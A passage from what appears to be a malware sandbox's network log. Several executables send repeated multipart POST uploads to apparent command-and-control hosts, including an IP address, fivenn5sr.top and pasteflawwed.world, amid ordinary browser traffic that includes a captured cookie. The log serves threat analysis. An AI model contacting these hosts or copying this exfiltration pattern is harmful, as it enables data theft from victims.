                                                                                              Set-Cookie: PHPSESSID=slu019ou7p38m318p81ejg1l1r; expires=Fri, 21 Feb 2025 00:33:35 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2B5NSCSZbn3DdxAc65V2AwfODsyfyOPqMlKJvaKEqWuFWym0nauVg6bxJI7gcEaHZFYA6gKORDeGw2n2b8PLoL5ByyCLPG8l0R4UUITKdRMfvBpQlvfNDpwFxQdyTD0%2FPFemMu4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67f6adef948a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42644&min_rtt=42392&rtt_var=9305&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=778&delivery_rate=93275&cwnd=253&unsent_bytes=0&cid=ac6e00b93b4032ab&ts=316&x=0"
                                                                                            • flag-de
                                                                                              GET
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Host: 5.75.210.149
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:39 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----aaie3ozmgv3ozusjwbsj
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 256
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:39 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----gv3w4e37ycbaaiw4ecjw
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----qqq168q16fusrimgln7q
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----2n79hdjwbsjmyu37gvkf
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 332
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:41 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----vaaaieusjwb1v3oh479r
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 4725
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----vs0h4ohdtjwbaa1d2dtr
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----mgl6fct2db16f3ozct2n
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 489
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fivenn5sr.top
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fivenn5sr.top
                                                                                              IN AAAA
                                                                                              Response
                                                                                              fivenn5sr.top
                                                                                              IN A
                                                                                              185.72.145.179
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://fivenn5sr.top/v1/upload.php
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              185.72.145.179:80
                                                                                              Request
                                                                                              POST /v1/upload.php HTTP/1.1
                                                                                              Host: fivenn5sr.top
                                                                                              Accept: */*
                                                                                              Content-Length: 465
                                                                                              Content-Type: multipart/form-data; boundary=------------------------CPWDGhif653HBLjAc7LLLQ
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Thu, 20 Feb 2025 00:33:44 GMT
                                                                                              content-type: text/plain; charset=utf-8
                                                                                              content-length: 2
                                                                                              x-ratelimit-limit: 30
                                                                                              x-ratelimit-remaining: 29
                                                                                              x-ratelimit-reset: 1740013425
                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              clients2.google.com
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              clients2.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              clients2.google.com
                                                                                              IN CNAME
                                                                                              clients.l.google.com
                                                                                              clients.l.google.com
                                                                                              IN A
                                                                                              172.217.169.78
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              172.217.169.78:443
                                                                                              Request
                                                                                              GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1 HTTP/2.0
                                                                                              host: clients2.google.com
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                              cookie: __Secure-ENID=25.SE=FqFe7UrTzzFPR0IaYsuhGNML1XH-htbGRn0dSMEcfFldrc08ldcRazHN8GZGWbmVFuVsOI2vcDBF9bcc_zkaTICskZXh9eqH4jq9AxT6nwu8iCXpFh2hJ3dFuiu6dKmX4HiNm3rIQi1BdlPVu-RTP-qSptzztOtor9nxszvH3Mqsq9h-Kdr_rnlDqZ_aHUJki6Q-bZLaiBTm
                                                                                            • flag-us
                                                                                              DNS
                                                                                              www.google.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              www.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              www.google.com
                                                                                              IN A
                                                                                              142.250.200.4
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/ddljson?async=ntp:2
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/ddljson?async=ntp:2 HTTP/2.0
                                                                                              host: www.google.com
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                                                                              host: www.google.com
                                                                                              x-client-data: CNCIywE=
                                                                                              sec-fetch-site: cross-site
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/newtab_promos
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/newtab_promos HTTP/2.0
                                                                                              host: www.google.com
                                                                                              sec-fetch-site: cross-site
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-us
                                                                                              DNS
                                                                                              ogads-pa.googleapis.com
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              Response
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.178.10
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              172.217.169.42
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.200.42
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.187.202
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              216.58.201.106
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              172.217.16.234
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              216.58.204.74
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              216.58.213.10
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.200.10
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              216.58.212.202
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.179.234
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.187.234
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              172.217.169.10
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.180.10
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fivenn5sr.top
                                                                                              IN A
                                                                                              Response
                                                                                              fivenn5sr.top
                                                                                              IN A
                                                                                              185.72.145.179
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fivenn5sr.top
                                                                                              IN AAAA
                                                                                              Response
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://fivenn5sr.top/v1/upload.php
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              185.72.145.179:80
                                                                                              Request
                                                                                              POST /v1/upload.php HTTP/1.1
                                                                                              Host: fivenn5sr.top
                                                                                              Accept: */*
                                                                                              Content-Length: 71613
                                                                                              Content-Type: multipart/form-data; boundary=------------------------shxtM70crZxS540HAwnhdZ
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Thu, 20 Feb 2025 00:33:46 GMT
                                                                                              content-type: text/plain; charset=utf-8
                                                                                              content-length: 2
                                                                                              x-ratelimit-limit: 30
                                                                                              x-ratelimit-remaining: 28
                                                                                              x-ratelimit-reset: 1740013425
                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              play.google.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              play.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              play.google.com
                                                                                              IN A
                                                                                              142.250.178.14
                                                                                            • flag-us
                                                                                              DNS
                                                                                              wildpadventures.tech
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              wildpadventures.tech
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BsEJLEHmB%2FaZGggkJQRWprcfXw1%2BHRRsjjaV1AC0dQNnJdQt1B2yYozpT5BuM5gFbGHC4nHLThjKrST%2BGl23V083Ws3Ba3iL7uJLmxgUxr6NfnWZc4k61Ck1R2job0O4QzTvQY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a683c8ca686d0-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=qme.6ZYr1a.7LyIkwkK5fTNJhyTxUAXbWMImkutuqpM-1740011626-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 55
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=217vofl5jettfn5nrig241pr7t; expires=Fri, 21 Feb 2025 00:33:47 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rzYMq7EyIL4QFXZ%2BbK8qs4OLB67Lknqvs7cCsEQjTxHlR5s3a07yM6UgL2XAEdXYusqbLLQIz6mbpu5VpYlBq9uO6ple4%2FhWvrZ%2Fui15LA4ydLrDNk0S9LbquAG8GCZ9A5nGDc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a683cdd1c86d0-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44361&min_rtt=41988&rtt_var=7872&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8572&recv_bytes=1077&delivery_rate=192760&cwnd=257&unsent_bytes=0&cid=9842a4d7a3e05c2b&ts=406&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=L1UZE2QOVIIQI
                                                                                              Cookie: __cf_mw_byp=qme.6ZYr1a.7LyIkwkK5fTNJhyTxUAXbWMImkutuqpM-1740011626-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1615
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=ljv6uu1ak0v6uf468dbc2peheb; expires=Fri, 21 Feb 2025 00:33:47 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bRItQWqa39wuhMkRzLAKUJXZDVNlvmYhYoFJwAi8mWUHRIntRCgI9%2BCFhK8EARdIQ0S6izuaYyKK7PEfxaIfme3OsrheBp%2Fh%2Fn8pv5JtvBWLcbIgXkkK5bKzHS4TMafXr0dpoEc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a683fea8386d0-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44081&min_rtt=41988&rtt_var=6465&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9745&recv_bytes=3117&delivery_rate=192760&cwnd=257&unsent_bytes=0&cid=9842a4d7a3e05c2b&ts=807&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=A5CC2O0XU5YKLW
                                                                                              Cookie: __cf_mw_byp=qme.6ZYr1a.7LyIkwkK5fTNJhyTxUAXbWMImkutuqpM-1740011626-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1099
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=h07it3vft5ev5435fjk4ng2dbv; expires=Fri, 21 Feb 2025 00:33:48 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1CHHuszgM6FhAeYZA2U%2BnMmFU6XuC4p%2ByNAZxqkpZoJegULMagLqLAyH%2FQCvNCpjnhtWvTVZ11mQMmjAij9RRVFFvn%2FsSxQDgPkfMvQZPOrFoNBuF2hw7iU%2B3F%2FIsjCEbTMh%2Fug%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6842b85d88cb-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42881&min_rtt=41993&rtt_var=10267&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=1803&delivery_rate=93881&cwnd=253&unsent_bytes=0&cid=fa3bfc8548911270&ts=351&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=qme.6ZYr1a.7LyIkwkK5fTNJhyTxUAXbWMImkutuqpM-1740011626-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 89
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=finuaplontc29vbenl51prhhtu; expires=Fri, 21 Feb 2025 00:33:48 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BpnhDjUE%2FqDEsDE3i5aIzwCCno0g9wAGb8Xf2HUvVnEHuVnghg8%2FY1n9KoRByh796ca3lXaNXr0u4lJb03izkDeTWm7yojE%2B%2FQD5Ec7YOmjRI6%2FEqFJHcwFNXu%2Fwqcpq77IXREk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6845bcf84190-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43123&min_rtt=41596&rtt_var=11589&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=780&delivery_rate=91282&cwnd=253&unsent_bytes=0&cid=51645285a0ef31d9&ts=269&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              microsoft.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              Response
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.112.250.133
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.231.239.246
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.70.246.20
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.236.44.162
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.76.201.171
                                                                                            • flag-us
                                                                                              DNS
                                                                                              microsoft.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              microsoft.com
                                                                                              IN MX
                                                                                              Response
                                                                                              microsoft.com
                                                                                              IN MX
                                                                                              microsoft-commail protectionoutlook�
                                                                                            • flag-us
                                                                                              DNS
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              Response
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              52.101.8.49
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              52.101.42.0
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              52.101.40.26
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              52.101.11.0
                                                                                            • flag-us
                                                                                              DNS
                                                                                              rebeldettern.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              rebeldettern.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              importenptoc.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              importenptoc.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----noh47g4eusr1vaa1nozc
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 1117
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
